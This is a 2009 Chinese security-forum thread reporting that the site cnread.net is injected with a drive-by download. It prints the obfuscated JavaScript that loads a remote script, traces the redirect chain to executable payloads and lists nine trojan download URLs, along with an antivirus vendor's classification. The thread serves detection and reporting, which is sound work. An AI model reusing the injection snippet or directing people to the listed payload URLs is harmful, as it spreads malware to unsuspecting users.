查看: 1904|回复: 2
收起左侧

[已鉴定] http://www.cnread.net(挂马)

[复制链接]
shadowmin
发表于 2009-6-15 18:52:52 | 显示全部楼层 |阅读模式
  1. var l="<";var r=">";var m="/";
  2. document.write(l+"sc"+"ript src=ht"+"tp:"+m+m+"ww"+"w.n%36%388."+"cn"+m+"tf"+m+"ad1.j"+"s"+r+l+m+"sc"+"ript"+r);
复制代码
Log is generated by FreShow.
[wide]http://www.cnread.net/cnread1/zxzj/b/bopuer/lsjd/index.html
    [frame]http://gd.cnread.net/cnread1/head.htm
        [frame]http://cnread.net/cnread1/dblm.html
        [script]http://www.zj0572.org/cnread1/adv.js
            [object]http://www.n688.cn/tf/ad1.js
                [frame]http://gegete.8800.org/a/a3.htm?sera
                    [frame]http://gegete.8800.org/a/index.htm
                        [frame]http://gegete.8800.org/a/flash.htm
                        [frame]http://gegete.8800.org/a/a44.htm
                            [script]http://gegete.8800.org/a/14.js
                                [object]http://tes10.com/wm/svchost.exe
                        [frame]http://gegete.8800.org/a/office.htm
                        [frame]http://gegete.8800.org/a/02.htm
                        [frame]http://gegete.8800.org/a/pef.pdf
                    [script]http://gegete.8800.org/a/\"http:\/\/js.tongji.cn.yahoo.com\/1083501\/ystat.js\"
                    [script]http://s31.cnzz.com/stat.php?id=1408284&web_id=1408284
    [script]http://www.cnread.net/cnread1/cnread.js
    [script]http://www.cnread.net/cnread1/cnread.js
    [script]http://www.cnread.net/cnread1/zxzj/b/bopuer/lsjd/../../../netease.js
    [script]http://www.cnread.net/cnread1/zxzj/b/bopuer/lsjd/../../../title1.js
    [script]http://www.cnread.net/cnread1/zxzj/b/bopuer/lsjd/../../../title2.js
    [script]http://www.cnread.net/cnread1/cnread1.js
        [script]http://leiyanstatic.xunlei.com/js/leiyanentry.js?
        [script]http://js.users.51.la/1001681.js
    [script]http://www.cnread.net/cnread1.js

[ 本帖最后由 shadowmin 于 2009-6-15 20:18 编辑 ]
knifed
发表于 2009-6-15 19:56:49 | 显示全部楼层
很容易就看到了.
幸福的猪猪
发表于 2009-6-16 05:47:36 | 显示全部楼层

回复 1楼 shadowmin 的帖子

http://www.n688.cn/tf/ad1.js
由此网址可以解出另外一个挂马网页。

附上由那个挂马网页解出的病毒下载地址:

http://fdgggg.cn/y1.exe
http://fdgggg.cn/y2.exe
http://fdgggg.cn/y3.exe
http://fdgggg.cn/y4.exe
http://fdgggg.cn/y5.exe
http://fdgggg.cn/y6.exe
http://fdgggg.cn/y7.exe
http://fdgggg.cn/y8.exe
http://fdgggg.cn/y9.exe


kaba all miss,to kill……(url to kaba)

Hello,

y1.exe_, y2.exe_, y3.exe_, y4.exe_, y5.exe_, y6.exe_, y7.exe_, y8.exe_, y9.exe_ - Trojan-Downloader.Win32.Geral.abl

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

这次终于是9x都是同一个病毒定义啦!


P.s.本来病毒下载地址只有一个的(http://fdgggg.cn/y1.exe),我只是用http://fdgggg.cn/y(*).exe的方法批量下载到其他8x的)
样本已经全部打包上报!

[ 本帖最后由 幸福的猪猪 于 2009-6-16 06:59 编辑 ]

9x.zip

332.43 KB, 下载次数: 15

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-17 08:04 , Processed in 0.125077 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表